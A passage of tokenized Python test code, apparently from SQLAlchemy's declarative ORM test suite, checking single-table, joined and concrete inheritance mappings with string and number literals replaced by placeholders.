<EOL> sess = create_session ( ) <EOL> c1 = Company ( <EOL> name = '<STR_LIT>' , <EOL> employees = [ <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) ] ) <EOL> c2 = Company ( name = '<STR_LIT>' , <EOL> employees = [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = '<STR_LIT>' ) ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . 
first ( ) , c2 ) <EOL> def test_single_colsonsub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert Person . __table__ . c . company_id is not None <EOL> assert Person . __table__ . c . golf_swing is not None <EOL> assert Person . __table__ . c . primary_language is not None <EOL> assert Engineer . primary_language is not None <EOL> assert Manager . golf_swing is not None <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> Base . metadata . 
create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> c1 = Company ( name = '<STR_LIT>' , employees = [ e1 , e2 , m1 ] ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> c2 = Company ( name = '<STR_LIT>' , employees = [ e3 ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( sess . query ( Engineer ) . filter_by ( primary_language = '<STR_LIT>' <EOL> ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) ) <EOL> def test_single_constraint_on_sub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> __hack_args_one__ = sa . UniqueConstraint ( <EOL> Person . name , primary_language ) <EOL> __hack_args_two__ = sa . CheckConstraint ( <EOL> Person . name != primary_language ) <EOL> uq = [ c for c in Person . __table__ . constraints <EOL> if isinstance ( c , sa . 
UniqueConstraint ) ] [ <NUM_LIT:0> ] <EOL> ck = [ c for c in Person . __table__ . constraints <EOL> if isinstance ( c , sa . CheckConstraint ) ] [ <NUM_LIT:0> ] <EOL> eq_ ( <EOL> list ( uq . columns ) , <EOL> [ Person . __table__ . c . name , Person . __table__ . c . primary_language ] <EOL> ) <EOL> eq_ ( <EOL> list ( ck . columns ) , <EOL> [ Person . __table__ . c . name , Person . __table__ . c . primary_language ] <EOL> ) <EOL> @ testing . skip_if ( lambda : testing . against ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_columns_single_inheritance_conflict_resolution ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> """<STR_LIT>""" <EOL> @ declared_attr <EOL> def target_id ( cls ) : <EOL> return cls . __table__ . c . get ( <EOL> '<STR_LIT>' , <EOL> Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ declared_attr <EOL> def target ( cls ) : <EOL> return relationship ( "<STR_LIT>" ) <EOL> class Manager ( Person ) : <EOL> """<STR_LIT>""" <EOL> @ declared_attr <EOL> def target_id ( cls ) : <EOL> return cls . __table__ . c . get ( <EOL> '<STR_LIT>' , <EOL> Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ declared_attr <EOL> def target ( cls ) : <EOL> return relationship ( "<STR_LIT>" ) <EOL> class Other ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> is_ ( <EOL> Engineer . target_id . property . columns [ <NUM_LIT:0> ] , <EOL> Person . __table__ . c . target_id <EOL> ) <EOL> is_ ( <EOL> Manager . target_id . property . columns [ <NUM_LIT:0> ] , <EOL> Person . __table__ . c . target_id <EOL> ) <EOL> Base . metadata . create_all ( ) <EOL> session = Session ( ) <EOL> o1 , o2 = Other ( ) , Other ( ) <EOL> session . add_all ( [ <EOL> Engineer ( target = o1 ) , <EOL> Manager ( target = o2 ) , <EOL> Manager ( target = o1 ) <EOL> ] ) <EOL> session . 
commit ( ) <EOL> eq_ ( session . query ( Engineer ) . first ( ) . target , o1 ) <EOL> def test_joined_from_single ( self ) : <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert Person . __table__ . c . golf_swing is not None <EOL> assert '<STR_LIT>' not in Person . __table__ . c <EOL> assert Engineer . __table__ . c . primary_language is not None <EOL> assert Engineer . primary_language is not None <EOL> assert Manager . golf_swing is not None <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> Base . metadata . 
create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> c1 = Company ( name = '<STR_LIT>' , employees = [ e1 , e2 , m1 ] ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> c2 = Company ( name = '<STR_LIT>' , employees = [ e3 ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . with_polymorphic ( Engineer ) . <EOL> filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( sess . query ( Engineer ) . filter_by ( primary_language = '<STR_LIT>' <EOL> ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) ) <EOL> def test_single_from_joined_colsonsub ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Manager ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Boss ( Manager ) : <EOL> boss_name = Column ( String ( <NUM_LIT:50> ) ) <EOL> is_ ( <EOL> Boss . __mapper__ . column_attrs [ '<STR_LIT>' ] . columns [ <NUM_LIT:0> ] , <EOL> Manager . __table__ . 
c . boss_name <EOL> ) <EOL> def test_polymorphic_on_converted_from_inst ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:A>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> discriminator = Column ( String ) <EOL> @ declared_attr <EOL> def __mapper_args__ ( cls ) : <EOL> return { <EOL> '<STR_LIT>' : cls . __name__ , <EOL> '<STR_LIT>' : cls . discriminator <EOL> } <EOL> class B ( A ) : <EOL> pass <EOL> is_ ( B . __mapper__ . polymorphic_on , A . __table__ . c . discriminator ) <EOL> def test_add_deferred ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> Person . name = deferred ( Column ( String ( <NUM_LIT:10> ) ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> p = Person ( name = '<STR_LIT>' ) <EOL> sess . add ( p ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . all ( ) , [ Person ( name = '<STR_LIT>' ) ] ) <EOL> sess . expunge_all ( ) <EOL> person = sess . query ( Person ) . filter ( Person . name == '<STR_LIT>' <EOL> ) . one ( ) <EOL> assert '<STR_LIT:name>' not in person . __dict__ <EOL> def test_single_fksonsub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language_id = Column ( Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> primary_language = relationship ( '<STR_LIT>' ) <EOL> class Language ( Base , fixtures . 
ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> java , cpp , cobol = Language ( name = '<STR_LIT>' ) , Language ( name = '<STR_LIT>' ) , Language ( name = '<STR_LIT>' ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = java ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = cpp ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = cobol ) <EOL> sess . add_all ( [ e1 , e2 , e3 ] ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language . has ( <EOL> Language . name <EOL> == '<STR_LIT>' ) ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ) <EOL> eq_ ( sess . query ( Engineer ) . filter ( Engineer . primary_language . has ( <EOL> Language . name <EOL> == '<STR_LIT>' ) ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ) <EOL> eq_ ( sess . query ( Person ) . join ( Engineer . primary_language ) . order_by ( <EOL> Language . name ) . all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = Language ( name = '<STR_LIT>' ) ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' <EOL> ) ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ] ) <EOL> def test_single_three_levels ( self ) : <EOL> class Person ( Base , fixtures . 
ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> class JuniorEngineer ( Engineer ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> nerf_gun = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert JuniorEngineer . nerf_gun <EOL> assert JuniorEngineer . primary_language <EOL> assert JuniorEngineer . name <EOL> assert Manager . golf_swing <EOL> assert Engineer . primary_language <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> def test_single_detects_conflict ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> def go ( ) : <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert_raises ( sa . exc . 
ArgumentError , go ) <EOL> def go ( ) : <EOL> class Salesman ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert_raises ( sa . exc . ArgumentError , go ) <EOL> def test_single_no_special_cols ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> def go ( ) : <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> foo_bar = Column ( Integer , primary_key = True ) <EOL> assert_raises_message ( sa . exc . ArgumentError , <EOL> '<STR_LIT>' , go ) <EOL> def test_single_no_table_args ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> def go ( ) : <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> __table_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> assert_raises_message ( sa . exc . ArgumentError , <EOL> '<STR_LIT>' , go ) <EOL> @ testing . 
emits_warning ( "<STR_LIT>" ) <EOL> def test_dupe_name_in_hierarchy ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = "<STR_LIT:a>" <EOL> id = Column ( Integer , primary_key = True ) <EOL> a_1 = A <EOL> class A ( a_1 ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer ( ) , ForeignKey ( a_1 . id ) , primary_key = True ) <EOL> assert A . __mapper__ . inherits is a_1 . __mapper__ <EOL> class OverlapColPrecedenceTest ( DeclarativeTestBase ) : <EOL> """<STR_LIT>""" <EOL> def _run_test ( self , Engineer , e_id , p_id ) : <EOL> p_table = Base . metadata . tables [ '<STR_LIT>' ] <EOL> e_table = Base . metadata . tables [ '<STR_LIT>' ] <EOL> assert Engineer . id . property . columns [ <NUM_LIT:0> ] is e_table . c [ e_id ] <EOL> assert Engineer . id . property . columns [ <NUM_LIT:1> ] is p_table . c [ p_id ] <EOL> def test_basic ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT:id>" , "<STR_LIT:id>" ) <EOL> def test_alt_name_base ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT:id>" , "<STR_LIT>" ) <EOL> def test_alt_name_sub ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> self . 
_run_test ( Engineer , "<STR_LIT>" , "<STR_LIT:id>" ) <EOL> def test_alt_name_both ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT>" , "<STR_LIT>" ) <EOL> from test . orm . test_events import _RemoveListeners <EOL> class ConcreteInhTest ( _RemoveListeners , DeclarativeTestBase ) : <EOL> def _roundtrip ( self , Employee , Manager , Engineer , Boss , <EOL> polymorphic = True , explicit_type = False ) : <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> b1 = Boss ( name = "<STR_LIT>" ) <EOL> if polymorphic : <EOL> for obj in [ e1 , e2 , m1 , e3 , b1 ] : <EOL> if explicit_type : <EOL> eq_ ( obj . type , obj . __mapper__ . polymorphic_identity ) <EOL> else : <EOL> assert_raises_message ( <EOL> AttributeError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> getattr , obj , "<STR_LIT:type>" <EOL> ) <EOL> else : <EOL> assert "<STR_LIT:type>" not in Engineer . __dict__ <EOL> assert "<STR_LIT:type>" not in Manager . __dict__ <EOL> assert "<STR_LIT:type>" not in Boss . __dict__ <EOL> sess . add_all ( [ e1 , e2 , m1 , e3 , b1 ] ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> if polymorphic : <EOL> eq_ ( sess . query ( Employee ) . order_by ( Employee . name ) . 
all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' ) , Manager ( name = '<STR_LIT>' ) , <EOL> Boss ( name = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' ) , Engineer ( name = '<STR_LIT>' ) ] ) <EOL> else : <EOL> eq_ ( sess . query ( Engineer ) . order_by ( Engineer . name ) . all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' ) , Engineer ( name = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' ) ] ) <EOL> eq_ ( sess . query ( Manager ) . all ( ) , [ Manager ( name = '<STR_LIT>' ) ] ) <EOL> eq_ ( sess . query ( Boss ) . all ( ) , [ Boss ( name = '<STR_LIT>' ) ] ) <EOL> def test_explicit ( self ) : <EOL> engineers = Table ( <EOL> '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , <EOL> Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> managers = Table ( '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> boss = Table ( '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> punion = polymorphic_union ( { <EOL> '<STR_LIT>' : engineers , <EOL> '<STR_LIT>' : managers , <EOL> '<STR_LIT>' : boss } , '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> class Employee ( Base , fixtures . ComparableEntity ) : <EOL> __table__ = punion <EOL> __mapper_args__ = { '<STR_LIT>' : punion . c . 
type } <EOL> class Engineer ( Employee ) : <EOL> __table__ = engineers <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Manager ( Employee ) : <EOL> __table__ = managers <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __table__ = boss <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_concrete_inline_non_polymorphic ( self ) : <EOL> """<STR_LIT>""" <EOL> class Employee ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss , polymorphic = False ) <EOL> def test_abstract_concrete_extension ( self ) : <EOL> class Employee ( AbstractConcreteBase , Base , fixtures . 
ComparableEntity ) : <EOL> pass <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_concrete_extension ( self ) : <EOL> class Employee ( ConcreteBase , Base , fixtures . 
